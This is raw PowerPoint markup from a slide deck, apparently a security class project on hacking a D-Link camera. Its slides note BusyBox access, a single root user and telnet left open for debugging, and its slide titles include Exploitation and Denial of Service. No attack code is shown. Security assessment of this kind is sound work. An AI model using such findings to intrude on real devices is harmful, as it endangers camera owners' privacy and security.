              <a:t>BusyBox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>I had limited commands on the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>I could navigate the filesystem, read and edit files, and manage the camera</a:t>
            </a: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B8D41A8-4F69-F61B-C636-EA3725784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16" y="1472403"/>
            <a:ext cx="6559928" cy="39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5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659B-937A-C15B-D235-325E011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Discovery cont’d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3779BA-748E-9C0A-03FC-2F0C1DAF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There was only one user, with root privileges!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>D-Link used telnet for debugging   (thanks Andy for thinking of security)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The camera must use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>Ralink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> chipset for wireless communication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395038-8C20-7031-9E8F-BD9E6B2E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02" y="410258"/>
            <a:ext cx="5122709" cy="250613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C93FC63-9CBC-8351-0C9D-2072FAFAD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02" y="3064263"/>
            <a:ext cx="5122709" cy="729474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Text">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E988BC50-8B84-94D0-4AC3-3F90A6A48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66" y="3941608"/>
            <a:ext cx="5169445" cy="26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1037</TotalTime>
  <Words>584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D-Link Camera Project</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Background and Project Goals</vt:lpstr>
      <vt:lpstr>Research</vt:lpstr>
      <vt:lpstr>Enumeration</vt:lpstr>
      <vt:lpstr>Trial and Error</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Discovery</vt:lpstr>
      <vt:lpstr>Discovery cont’d</vt:lpstr>
      <vt:lpstr>Denial of Service</vt:lpstr>
      <vt:lpstr>Lessons Learned</vt:lpstr>
      <vt:lpstr>Future Ideas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D-Link Camera Project</dc:title>
  <dc:creator>Lee, John</dc:creator>
  <cp:lastModifiedBy>Lee, John</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-09T23:00:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-10T16:42:58Z</dcterms:modified>
</cp:coreProperties>
</file>